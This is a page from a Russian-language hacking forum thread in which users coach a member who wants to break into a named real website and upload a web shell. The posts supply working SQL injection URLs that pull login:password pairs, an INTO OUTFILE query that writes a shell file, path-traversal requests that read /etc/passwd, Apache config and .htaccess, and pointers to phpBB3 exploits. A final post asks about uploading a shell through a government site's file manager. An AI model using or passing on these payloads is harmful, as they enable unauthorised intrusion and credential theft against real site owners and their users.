Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    Почему решили что фейк? И лог тоже фейковый?
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Реально видел, правда один раз, сам админ написал при ../etc/passwd - "это фейк:)", скорее всего нет прав на чтение

    и потом, logs/error_log вовсе не означает, что это тут:

    /etc/httpd/logs/error_log
     
    #7642 Pashkela, 17 Jun 2009
    Last edited: 17 Jun 2009
    1 person likes this.
  3. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    Тогда относительно чего же этот путь
    logs/error_log
     
  4. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    все там норм, никакого фейка..логи ищи. Поиск тебе в руки, была тема еttee.
     
  5. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    Логов по стандартным путям из темы http://forum.antichat.ru/thread49775.html не нашлось
     
  6. Скорпиончик

    Joined:
    16 Jun 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -5
    Можно ли залить shell сюда?

    http://egechita.ru/documents/show_doc.php?doc=68&type=federalsfhjdgj

    2 вопрос

    /home/www/egechita/documents/show_doc.php

    вот структура сайта.

    Что я могу ещё полезного вытащить кроме етк/пасс?

    сервер *nix
     
    #7646 Скорпиончик, 18 Jun 2009
    Last edited: 18 Jun 2009
  7. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Скорпиончик
    Вот там еще нашел http://egechita.ru/news/show_news.php?id_news=56+union+select+1,concat_ws(0x3a,login,pass),3,4,5+from+user+limit+1,1/*
    пятая ветка
     
  8. Скорпиончик

    Joined:
    16 Jun 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -5
    я это находил. эти нечего не дают пассы. надо шелл залить
     
  9. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    попробуй INTO OUTFILE и ищи папку с правами на запись
     
  10. Скорпиончик

    Joined:
    16 Jun 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -5
    подскадите как составить запрос на запись файла.
     
  11. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    например:
    http://egechita.ru/news/show_news.php?id_news=-1+UNION+SELECT+1,2,3,4,5+INTO+OUTFILE+'/tmp/shell.php'+--+

    мб пригодится
    http://egechita.ru/documents/show_doc.php?doc=../../../../../../../../etc/httpd/conf/httpd.conf
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Fuckel

    Я вот одного не пойму, зачем советовать то, что не будет работать?
    Для записи в файл нужны права, а там их нет у юзера

    Скорпиончик Сначала нужно почитать что-то , а потом по прочтению задавать вопросы. Статей куча на форуме
     
    1 person likes this.
  13. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    я посоветовал ему попробывать, не утверждал что будет работать
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Можно получить доступ к приватной инфо, кое-что почитать и прочитав нужное сделать таки своё грязное дело:)

    Code:
    http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../home/www/egechita/forum/.htaccess%00
    
    плюс там есть сессии в куках, зарегится везде, где только можно, выкупить путь хранения сессий и посмотреть, что выдаст

    там кстати PHPBB3, шелл там льется элементарно, если попасть в админку

    ЗЫЖ А можно поискать логи и не париться:)
     
    #7654 Pashkela, 18 Jun 2009
    Last edited: 18 Jun 2009
    1 person likes this.
  15. Скорпиончик

    Joined:
    16 Jun 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -5
    спс, может ктонить знает какиенить эксплоиты для phpbb3. Подскажите плиз.
    какиенибудь ссылки. Уж очень хочиться проникнуть в серв.
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/thread24488.html
     
  17. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    2 Скорпиончик

    http://egechita.ru/documents/show_doc.php?doc=68&type=../../../../../etc/httpd/conf/httpd.conf%00

    Конфиг апача. Видим что есть еще два хоста temp.egechita.ru и online.egechita.ru

    смотрим online.egechita.ru и видим

    http://online.egechita.ru/?theme=-7+union+select+1,2,3,4,5--

    SQL injection

    Хеш админа форума доступен
     
    2 people like this.
  18. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Какие системные и *несистемные* таблицы есть в PostgreSql ? information_schema там вообще нету
     
  19. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.postgresql.org/docs/8.3/static/catalogs.html
     
  20. FAPSI

    FAPSI Banned

    Joined:
    18 Sep 2008
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    Гуру, не пойму, можно ли залить шелл с помощью этой формы?
    http://www.parliament.ge/adm_includes/editor/file_manager.php

    Так же не пойму, то ли форма фильрует рисунки то ли удаляет файл
     
Thread Status:
Not open for further replies.